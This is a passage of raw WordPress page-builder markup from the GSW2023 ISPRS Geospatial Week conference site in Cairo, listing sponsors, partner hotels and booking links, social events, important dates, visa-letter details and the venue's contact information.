css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading 